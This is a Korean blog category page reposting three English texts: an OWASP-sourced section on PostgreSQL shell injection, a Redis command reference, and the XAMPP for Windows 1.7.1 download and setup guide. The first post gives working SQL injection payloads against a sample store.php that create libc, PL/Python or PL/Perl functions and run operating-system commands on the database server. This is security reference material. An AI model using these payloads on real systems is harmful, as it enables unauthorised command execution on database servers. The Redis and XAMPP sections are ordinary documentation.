'Perl'에 해당되는 글 4건

  1. 2010.08.05 PostgreSQL Shell Injection
  2. 2009.12.17 Redis Command Reference
  3. 2009.06.09 XAMPP for Windows
2010.08.05 15:19

PostgreSQL Shell Injection

Shell Injection

PostgreSQL provides a mechanism to add custom functions by using both Dynamic Library and scripting languages such as python, perl, and tcl.

Dynamic Library

Until PostgreSQL 8.1, it was possible to add a custom function linked with libc:

  • CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Since system returns an int how we can fetch results from system stdout?

Here's a little trick:

  • create a stdout table
    CREATE TABLE stdout(id serial, system_out text)
  • executing a shell command redirecting its stdout
    SELECT system('uname -a > /tmp/test')
  • use a COPY statements to push output of previous command in stdout table
    COPY stdout(system_out) FROM '/tmp/test'
  • retrieve output from stdout
    SELECT system_out FROM stdout

Example:

 
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

plpython

PL/Python allows users to code PostgreSQL functions in python. It's untrusted so there is no way to restrict what user can do. It's not installed by default and can be enabled on a given database by CREATELANG

  • Check if PL/Python has been enabled on a database:
    SELECT count(*) FROM pg_language WHERE lanname='plpythonu'
  • If not, try to enable:
    CREATE LANGUAGE plpythonu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS ‘import os; return os.popen(args[0]).read()’ LANGUAGE plpythonu;--
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--

plperl

Plperl allows us to code PostgreSQL functions in perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as open. By doing so, it's impossible to gain OS-level access. To successfully inject a proxyshell like function, we need to install the untrusted version from the postgres user, to avoid the so-called application mask filtering of trusted/untrusted operations.

  • Check if PL/perl-untrusted has been enabled:
    SELECT count(*) FROM pg_language WHERE lanname='plperlu'
  • If not, assuming that sysadm has already installed the plperl package, try :
    CREATE LANGUAGE plperlu
  • If either of the above succeeded, create a proxy shell function:
    CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu
  • Have fun with:
    SELECT proxyshell(os command);

Example:

  • Create a proxy shell function:
    /store.php?id=1; CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",<FD>);' LANGUAGE plperlu;
  • Run an OS Command:
    /store.php?id=1 UNION ALL SELECT NULL, proxyshell('whoami'), NULL OFFSET 1;--


출처 : www.owasp.org

Trackback 0 Comment 0
2009.12.17 19:50

Redis Command Reference

memcached 류의 Key-Value 모델 이상의 역할을 수행하는 것이 가능하다.

PHP와 Redis만으로 (즉, 별도의 Database 등을 사용하지 않고) 개발되고 있다.

 

Every command name links to a specific wiki page describing the behavior of the command.

Connection handling

  • QUIT close the connection
  • AUTH simple password authentication if enabled

Commands operating on all the kind of values

  • EXISTS key test if a key exists
  • DEL key delete a key
  • TYPE key return the type of the value stored at key
  • KEYS pattern return all the keys matching a given pattern
  • RANDOMKEY return a random key from the key space
  • RENAME oldname newname rename the old key in the new one, destroing the newname key if it already exists
  • RENAMENX oldname newname rename the old key in the new one, if the newname key does not already exist
  • DBSIZE return the number of keys in the current db
  • EXPIRE set a time to live in seconds on a key
  • TTL get the time to live in seconds of a key
  • SELECT index Select the DB having the specified index
  • MOVE key dbindex Move the key from the currently selected DB to the DB having as index dbindex
  • FLUSHDB Remove all the keys of the currently selected DB
  • FLUSHALL Remove all the keys from all the databases

Commands operating on string values

  • SET key value set a key to a string value
  • GET key return the string value of the key
  • GETSET key value set a key to a string returning the old value of the key
  • MGET key1 key2 ... keyN multi-get, return the strings values of the keys
  • SETNX key value set a key to a string value if the key does not exist
  • MSET key1 value1 key2 value2 ... keyN valueN set a multiple keys to multiple values in a single atomic operation
  • MSETNX key1 value1 key2 value2 ... keyN valueN set a multiple keys to multiple values in a single atomic operation if none of the keys already exist
  • INCR key increment the integer value of key
  • INCRBY key integer increment the integer value of key by integer
  • DECR key decrement the integer value of key
  • DECRBY key integer decrement the integer value of key by integer

Commands operating on lists

  • RPUSH key value Append an element to the tail of the List value at key
  • LPUSH key value Append an element to the head of the List value at key
  • LLEN key Return the length of the List value at key
  • LRANGE key start end Return a range of elements from the List at key
  • LTRIM key start end Trim the list at key to the specified range of elements
  • LINDEX key index Return the element at index position from the List at key
  • LSET key index value Set a new value as the element at index position of the List at key
  • LREM key count value Remove the first-N, last-N, or all the elements matching value from the List at key
  • LPOP key Return and remove (atomically) the first element of the List at key
  • RPOP key Return and remove (atomically) the last element of the List at key
  • RPOPLPUSH srckey dstkey Return and remove (atomically) the last element of the source List stored at _srckey_ and push the same element to the destination List stored at _dstkey_

Commands operating on sets

  • SADD key member Add the specified member to the Set value at key
  • SREM key member Remove the specified member from the Set value at key
  • SPOP key Remove and return (pop) a random element from the Set value at key
  • SMOVE srckey dstkey member Move the specified member from one Set to another atomically
  • SCARD key Return the number of elements (the cardinality) of the Set at key
  • SISMEMBER key member Test if the specified value is a member of the Set at key
  • SINTER key1 key2 ... keyN Return the intersection between the Sets stored at key1, key2, ..., keyN
  • SINTERSTORE dstkey key1 key2 ... keyN Compute the intersection between the Sets stored at key1, key2, ..., keyN, and store the resulting Set at dstkey
  • SUNION key1 key2 ... keyN Return the union between the Sets stored at key1, key2, ..., keyN
  • SUNIONSTORE dstkey key1 key2 ... keyN Compute the union between the Sets stored at key1, key2, ..., keyN, and store the resulting Set at dstkey
  • SDIFF key1 key2 ... keyN Return the difference between the Set stored at key1 and all the Sets key2, ..., keyN
  • SDIFFSTORE dstkey key1 key2 ... keyN Compute the difference between the Set key1 and all the Sets key2, ..., keyN, and store the resulting Set at dstkey
  • SMEMBERS key Return all the members of the Set value at key
  • SRANDMEMBER key Return a random member of the Set value at key

Commands operating on sorted sets (zsets, Redis version >= 1.1)

  • ZADD key score member Add the specified member to the Set value at key or update the score if it already exist
  • ZREM key member Remove the specified member from the Set value at key
  • ZRANGE key start end Return a range of elements from the sorted set at key
  • ZREVRANGE key start end Return a range of elements from the sorted set at key, exactly like ZRANGE, but the sorted set is ordered in traversed in reverse order, from the greatest to the smallest score
  • ZRANGEBYSCORE key min max Return all the elements with score >= min and score <= max (a range query) from the sorted set
  • ZCARD key Return the cardinality (number of elements) of the sorted set at key
  • ZSCORE key element Return the score associated with the specified element of the sorted set at key
  • ZREMRANGEBYSCORE key min max Remove all the elements with score >= min and score <= max from the sorted set

Sorting

  • SORT key BY pattern LIMIT start end GET pattern ASC|DESC ALPHA Sort a Set or a List accordingly to the specified parameters

Persistence control commands

  • SAVE Synchronously save the DB on disk
  • BGSAVE Asynchronously save the DB on disk
  • LASTSAVE Return the UNIX time stamp of the last successfully saving of the dataset on disk
  • SHUTDOWN Synchronously save the DB on disk, then shutdown the server
  • BGREWRITEAOF Rewrite the append only file in background when it gets too big

Remote server control commands

  • INFO Provide information and statistics about the server
  • MONITOR Dump all the received requests in real time
  • SLAVEOF Change the replication settings

출처 : http://code.google.com/p/redis

Trackback 0 Comment 0
2009.06.09 19:29

XAMPP for Windows

The XAMPP 1.7.1 is available!

We've released a new version of XAMPP, including:

  • Apache HTTPD 2.2.11 + Openssl 0.9.8i
  • MySQL 5.1.33
  • PHP 5.2.9
  • phpMyAdmin 3.1.3.1
  • XAMPP CLI Bundle 1.3
  • FileZilla FTP Server 0.9.31
  • Mercury Mail Transport System 4.62
Please visit the win32 compatibility list.

Vista Note: Because missing or insufficient write permissions in the c:\program files folder of the default vista installation, we recommend to use alternate folders for XAMPP e.g. c:\xampp or c:\myfolder\xampp.

Big thanks to Chris from www.nat32.com for his fast adaption of his XAMPP Control Panel. Download older versions of XAMPP (even the "old" WAMPP) directly from Source Forge.

Download

* XAMPP

You can download XAMPP for Windows as three different variations:
Installer
Easy and safe: XAMPP with a comfortable installer.
ZIP archive
For purists: XAMPP as ordinary ZIP archive.
Self-extracting ZIP archive
Economical: XAMPP as very small self-extracting 7-ZIP archive.
XAMPP for Windows 1.7.1, 2009/04/14

Version

Size

Content
XAMPP Windows 1.7.1
[Basic package]
Apache HTTPD 2.2.11, MySQL 5.1.33, PHP 5.2.9, Openssl 0.9.8i, phpMyAdmin 3.1.3.1, XAMPP Control Panel 2.5, XAMPP CLI Bundle 1.3, Webalizer 2.01-10, Mercury Mail Transport System v4.62, FileZilla FTP Server 0.9.31, SQLite 2.8.15, ADODB 5.06a, Zend Optimizer 3.3.0, eAccelerator 0.9.5.3, XAMPP Security, Ming. For Windows 2000, 2003, XP, VISTA. See also README
Installer 35 MB Installer
MD5 checksum: 9a0974516975432788c3c853ae31e518
ZIP 82 MB ZIP archive
MD5 checksum: 98c5db072a4163fa7772f32769bcfdd8
EXE (7-zip) 31 MB Selfextracting 7-ZIP archive
MD5 checksum: 6208b5e9154fe191061076e3965bb76a
Devel Package 1.7.1 Development Package with Include and Lib-Files from the Apache 2.2.11, MySQL 5.1.33, PHP 5.2.9, OpenSSL 0.9.8i (libs & includes) & drivers.
ZIP 46 MB ZIP archive
MD5 checksum: b0b2b85d2bba322be6939bb99efdc7c9
EXE (7-zip) 23 MB Selfextracting 7-ZIP archive
MD5 checksum: 688406de1a0d76d19aa21e9469f3287c
Upgrade Package 1.7.1 With Apache 2.2.11, PHP 5.2.9, OpenSSL 0.9.8i, MySQL 5.1.33, phpMyAdmin 3.1.3.1, FileZilla FTP Server 0.9.31, XAMPP CLI Bundle 1.3. for XAMPP 1.7.0. CHANGES
Installer 30 MB Installer
MD5 checksum: a6fa85f5c1cfa2049c69e35dd12484d6
ZIP 69 MB ZIP archive
MD5 checksum: b67325f381de3167976a2951808cb6c9
EXE (7-zip) 26 MB Selfextracting 7-ZIP archive
MD5 checksum: 66bb840246137c3a83fa173696337307

* XAMPP Add-Ons

The following packages are extensions (add-ons) for the above XAMPP package.
XAMPP for Windows Add-Ons

Version

Size

Content
Perl 5.10.0-2.2.11
XAMPP 1.7.1
Apache 2.2.11
Attention: Not recommended for upgrade installations!
Perl 5.10.0 (no ActivePerl) and mod_perl 2.0.4 Add-on package for the XAMPP 1.7.1 with Apache 2.2.11. Needs NT, 2000 or XP systems! For the older XAMPP Version you need the older Perl XAMPP add-ons on www.sourceforge.net.
See also README PERL MODULES
Installer 14 MB Installer
MD5 checksum: 3dbe957a0f4a918da85f587bb175a43f
ZIP 30 MB ZIP archive
MD5 checksum: ab36b2842067c07365246279d3b74314
EXE (7-zip) 13 MB Selfextracting ZIP archive
MD5 checksum: 34f14562fec5bea313bc195035fd1574
Tomcat 6.0.18
XAMPP 1.7.x
Tomcat 6.0.18 and mod_jk 1.2.27 for the XAMPP base package 1.7.x. NEEDS SUN J2SE SDK 5/6. The Addon Installer is build for the XAMPP Installer Version only. See also README
Installer 8 MB Installer
MD5 checksum: 18b979a1329d3b536d9d11289d6e6e06
ZIP 10 MB ZIP archive
MD5 checksum: fbdd2e7e6e228f8ddff272b472899e07
EXE (7-zip) 8 MB Selfextracting 7-ZIP archive
MD5 checksum: a9e6d071ead5ff2d275a124dac181024

* XAMPP Lite

»XAMPP Lite« is an additional extra small XAMPP edition. It's the successor of the old MiniXAMPP. But in contrast to the big XAMPP it's not updated really often.
XAMPP Lite

Version

Size

Content
XAMPP Lite 1.7.1 XAMPP Lite is a very reduced version of XAMPP with Apache 2.2.11 + PHP 5.2.9 + MySQL 5.1.33 + phpMyAdmin 3.1.3.1 + OpenSSL 0.9.8i + SQLite 2.8.15 + XAMPP Control Panel 2.5 + XAMPP CLI Bundle 1.3. For lovers! For the lite versions exist no upgrades or addons. XAMPP Lite is an only "Take-Run-Delete-Forget-it" package.
ZIP 50 MB ZIP archive
MD5 checksum: f4d40cd261519f6d325066fbef84b4ae
EXE (7-zip) 18 MB Selfextracting ZIP archive
MD5 checksum: 8f8de43051dc03c79f75a39e6c0db240

The Installation

* Method A: Installation with the Installer

Using the installer version is the easiest way to install XAMPP.

 

The install wizard of XAMPP win32

After the installation is complete, you will find XAMPP under Start / Programs / XAMPP. You can use the XAMPP Control Panel to start/stop all server and also install/uninstall services.

 

The XAMPP control panel for start/stop Apache, MySQL, FilaZilla & Mercury or install these server as services

* Method B: "Installation" without the Installer

Download and unzip the 7-zip or zip archives into the folder of your choice.

In this case, we unpacked XAMPP to D:\Program Files and will get a D:\Program Files\XAMPP folder. Next, open the XAMPP folder and run the "setup-xampp.bat" file.

All paths in the configuration will be updated.

Finally, start the different servers with the existing start/stop batch files or use the GUI version "xampp-control.exe".

Note: If you work with the Installer version of XAMPP, you do not need to execute "setup_xampp.bat".

* »I want to start XAMPP without setup!«

If you extract XAMPP in a top level folder like c:\xampp or d:\xampp etc., you can start XAMPP directly. That means you do not need to execute the "setup_xampp.bat" at all. Apache, MySQL and Mercury Mail server will start up correctly! FileZilla FTP server will not start because it requires absolute paths. Please note: Do not use a double-xampp-folder like c:\xampp\xampp! You need a single-xampp folder like d:\xampp(\apache and so on). Otherwise you must run the "setup-xampp.bat" to set up the path configurations.

The Practice

* The xampp cli (xampp common line interface)

For all friends of the console (cmd) here the new build "xampp_cli" by Carsten Wiedmann.

Usage: xampp_cli «command» «service»

Example 1: Apache and MySQL starting and stopping
xampp_cli start xampp
xampp_cli stop xampp

Example 2: Apache installing and removing as service
xampp_cli installservice apache
xampp_cli deinstallservice apache

Example 3: Mercury starting and stopping
xampp_cli start mercury
xampp_cli stop mercury

* Practice 1: Start, stop & test XAMPP

The universal control center is the XAMPP Control from www.nat32.com which is not included in the Lite version.

.\xampp\xampp-control.exe

Some more server scripts:
Apache & MySQL start: .\xampp\xampp_start.exe
Apache & MySQL stop: .\xampp\xampp_stop.exe
Apache start: .\xampp\apache_start.bat
Apache stop: .\xampp\apache_stop.bat
MySQL start: .\xampp\mysql_start.bat
MySQL stop: .\xampp\mysql_stop.bat
Mercury Mailserver start: .\xampp\mercury_start.bat
(Mercury only GUI. Stop with GUI)
FileZilla Server setup: .\xampp\filezilla_setup.bat
FileZilla Server start: .\xampp\filezilla_start.bat
FileZilla Server stop: .\xampp\filezilla_stop.bat

Test: After Apache starts, open the URL http://localhost or http://127.0.0.1 and examine all of the XAMPP examples and tools.

* Practice 2: Installing a particular server as a service

You can install some servers as a service under these platforms: NT4, 2000/2003, XP and (sometimes) Vista. Therefore you can use one of these scripts:

Apache service install: .\xampp\apache\apache_installservice.bat
Apache service uninstall: .\xampp\apache\apache_uninstallservice.bat
MySQL service install: .\xampp\mysql\mysql_installservice.bat
MySQL service uninstall: .\xampp\mysql\mysql_uninstallservice.bat
FileZilla service (un)install: .\xampp\filezilla_setup.bat
Mercury: No service installation available!

* Practice 3: Installation of Addons

Many additional addons exist for the development with the main package. At the moment, the official addons for win32 from this side are:
  • Perl Addon with Mod_Perl and a selection important Perl Modules
  • Tomcat Addon (Requirement: SUN J2SE SDK must already be installed)
  • Cocoon for Tomcat Addon (Requirement: Tomcat Addon must already be installed)
  • Python Addon
The recommended rule for the installation is this: The XAMPP Installer version needs the Installer Addon, the ZIP (7-Zip) package needs the ZIP (7-Zip) Addon. For the ZIP Addon please unpack the package into the XAMPP main directory directly. Afterwards execute the "setup_xampp.bat". That's all. Installer Addon package makes everything automatically. There is nothing to do.

Note: Everyone can build a new XAMPP Addon for his project. For example you will find some other addons for XAMPP at http://sourceforge.net/projects/xamppaddon.

* Practice 4: The XAMPP upgrades

When individual components of the XAMPP collection are upgraded, we will bring XAMPP up to date as well. However, some developments are not compatible to our last release and so we cannot upgrade these elements. Usually we are able to update all servers and programms in XAMPP. NOT the configuration files because you could have modified them. Tip: If you have the installer version it is much easier to use the installer upgrade. All others should take the (7-)ZIP archive. Extract that package in the XAMPP folder directly and overwrite the older files.

A matter of security (A MUST READ!)

* The XAMPP Security console

As mentioned before, XAMPP is not meant for production use but only for developers in a development environment. XAMPP is configured is to be as open as possible and to allow the web developer anything he/she wants. For development environments this is great but in a production environment it could be fatal.

Here a list of missing security in XAMPP:

  • The MySQL administrator (root) has no password.
  • The MySQL daemon is accessible via network.
  • PhpMyAdmin is accessible via network.
  • Examples are accessible via network.
  • The user of Mercury and FileZilla are known.
Please secure XAMPP before publishing anything online. A firewall or an external router are only sufficient for low levels of security. For slightly more security, you can run the "XAMPP Security console" and assign passwords.

To fix the most important of the security weaknesses simply call the following URL (access only from localhost):

Before version 1.4.15:
http://127.0.0.1/xampp/xamppsecurity.php

Since version 1.4.15:
http://127.0.0.1/security

The root password for MySQL, PhpMyAdmin, and also a XAMPP directory protection can be established here. For Mercury and FileZilla, please remember to change the configuration settings (e.g. user and passwords). Or if you do not need any of these servers, simply do not start them -- That is secure, too.

The Uninstallation

* Method A: The Installer version

If you installed with the Installer version, please use the Uninstaller! The Uninstaller will delete all XAMPP entries from your registry and it will uninstall some installed services included with XAMPP. We highly recommend that you use the Uninstall program for removing XAMPP installations from the Installer version.

* Method B: Installation from ZIP and 7-ZIP package

Shut down the XAMPP server and exit all panels. If you installed any services, shut them down too.

To uninstall XAMPP that was installed from ZIP packages, simply delete the entire folder where XAMPP is installed. There are no registry entries and no environment variables to clean up... just simply good, clean code! Don't forget to uninstall any services you might have installed.

Basic Questions

* Question 1: What is the "Lite" version of XAMPP?

XAMPP Lite (means "light" as in "light-weight") is a smaller bundle of XAMPP components, which is recommended for quick work using only PHP and MySQL. Some servers or tools such as Mercury Mail and FileZilla FTP are missing in the Lite version. Additionally, there are no Install Shield versions, add-ons or upgrades for the Lite version.

* Question 2: Where should I place my web content?

The main folder for all WWW documents is at \xampp\htdocs. If you put a test.html file here you can browse for it at http://localhost/test.html (if Apache server is running). Use the same procedure with all PHP or cgi files. You can create subfolders for your content too. For example, create the folder \xampp\htdocs\new and copy your test.html file there. Then enter the URL http://localhost/new/test.html to view this in your browser.

Further file characteristics in the overview:

  • CGI - Executable: Overall, Allowed endings: .cgi => base package
  • PHP - Executable: Overall, Allowed endings: .php .php4 .php3 .phtml => base package
  • MOD Perl - Executable: .\xampp\htdocs\modperl, Allowed endings: .pl => Perl addon
  • ASP Perl - Executable: .\xampp\htdocs\modperlasp, Allowed endings: .asp => Perl Addon
  • JSP Java - Executable: .\xampp\tomcat\webapps\java (u.a), Allowed endings: .jsp => Tomcat addon
  • Servlets Java - Executable: .\xampp\tomcat\webapps\java (u.a), Allowed endings: .html (u.a) => Tomcat addon
  • MOD Python - Executable: .\xampp\htdocs\python, Allowed endings: .py => Python addon Spyce Python - Executable: .\xampp\htdocs\python, Allowed endings: .spy => Python addon

* Question 3: Can I move the XAMPP installation?

Yes, but only if you installed it using the ZIP (z-zip) archive method. After moving the XAMPP package, you must execute the "setup-xampp.bat" to update all configuration files. In this case you can make a copy of XAMPP and put this in a directory somewhere. At last execute the "setup-xampp" and make your tests. Try it out.

If you installed with the Installer, then you must completely uninstall XAMPP and reinstall it at the new location. This is the only way to ensure that all changes made to the registry are cleaned up, and updated for the new location.

* Question 4: How can I generate "automatic start sites" or default start pages?

If you browse to a folder like http://localhost/xampp/ the Apache server will return a start site automatically. The Apache server looks for a start page for your site, such as index.html or index.php. This is configurable from the "DirectoryIndex" directive in the httpd.conf file. Here you can define the names and the arrangement for your start sites.

In XAMPP the "DirectoryIndex" directive list is as follows:

index.php index.php4 index.php3 index.cgi index.pl index.html index.htm index.html.var index.phtml

* Question 5: How can I switch between PHP5 and PHP4 and back?

XAMPP (not Lite!) contains both PHP5 and PHP4. To switch between the versions please use the "php-switch.bat" ($path-to-xampp\xampp\php-switch.bat). NOTE: The Apache server must be stopped before you make these changes.

* Question 6: Where can I change the configuration?

You adjust XAMPP settings with plain-text configuration files. The following files exist:
  • Apache basic configuration: .\xampp\apache\conf\httpd.conf
  • Apache SSL: .\xampp\apache\conf\ssl.conf
  • Apache Perl (only addon): .\xampp\apache\conf\perl.conf
  • Apache Tomcat (only addon): .\xampp\apache\conf\java.conf
  • Apache Python (only addon): .\xampp\apache\conf\python.conf
  • PHP: .\xampp\php\php.ini
  • MySQL: .\xampp\mysql\bin\my.ini
  • phpMyAdmin: .\xampp\phpMyAdmin\config.inc.php
  • FileZilla FTP: .\xampp\FileZillaFTP\FileZilla Server.xml
  • Mercury Mail basic configuration: .\xampp\MercuryMail\MERCURY.INI
  • Sendmail: .\xampp\sendmail\sendmail.ini

* Question 7: Do I have to go online to work with XAMPP?

No! You can work "offline" with XAMPP. In other words, you do NOT have to be connected to the Internet, because your own computer will provide all the hosting and serving features.

* Question 8: Where is what?

Directory Content
\xampp\anonymous Anonymous FTP example folder
\xampp\apache Apache server directory
\xampp\cgi-bin Dir for executing cgi scripts
\xampp\FileZillaFTP FileZilla FTP server directory
\xampp\htdocs Main http docs directory
\xampp\install For Setup XAMPP (do not delete!)
\xampp\licenses Dito
\xampp\MercuryMail Mercury Mail SMTP POP3 IMAP server dir
\xampp\mysql MySQL server directory
\xampp\perl Perl directory
\xampp\php PHP (4+5) directory
\xampp\phpmyadmin phpMyAdmin directory
\xampp\security Extra directory for security configs
\xampp\tmp The temporary folder
\xampp\webalizer Webalizer web statistic directory
\xampp\webdav WebDAV Authoring example folder

READ ME

* Where can I get more information (FAQs, etc.)?

Please visit our XAMPP Windows FAQs:
http://www.apachefriends.org/en/faq-xampp-windows.html

Or use our forum for questions:
http://www.apachefriends.org/f/

* XAMPP and services

For all NT/2000 users, in both packages you will find the install and uninstall files to build all servers as services in the respective directories.
  • apache_installservice.bat => Apache install as service/li>
  • apache_uninstallservice.bat => Apache uninstall as service
  • mysql_installservice.bat => MySQL install as service
  • mysql_uninstallservice.bat => MySQL uninstall as service
After all changes don't forget to restart your system. Note! To uninstall the mysql service you must first of all have stopped the mysql service!

* MySQL and PHP

MySQL starts without a password for "root". So in PHP you can connect the MySQL-Server with: mysql_connect("localhost","root","");
If you want to set a password for "root" in MySQL, please use "mysqladmin" under Console. For example:

\...\xampp\mysql\bin\mysqladmin -u root password secret

Attention. After changing the password for root, don't forget to inform PHPMyAdmin. Search the "config.inc.php" under \...\xampp\phpmyadmin\ and edit the following lines:

$cfg['Servers'][$i]['user'] = 'root'; // MySQL SuperUser
$cfg['Servers'][$i]['auth_type'] = 'http'; // HTTP MySQL authentification

Now the correct password for "root" is required, before PHPMyAdmin starts.

Please see also the three methods in the Windows FAQ:
http://www.apachefriends.org/en/faq-xampp-windows.html#password0
원문 : http://www.apachefriends.org/

Trackback 12 Comment 0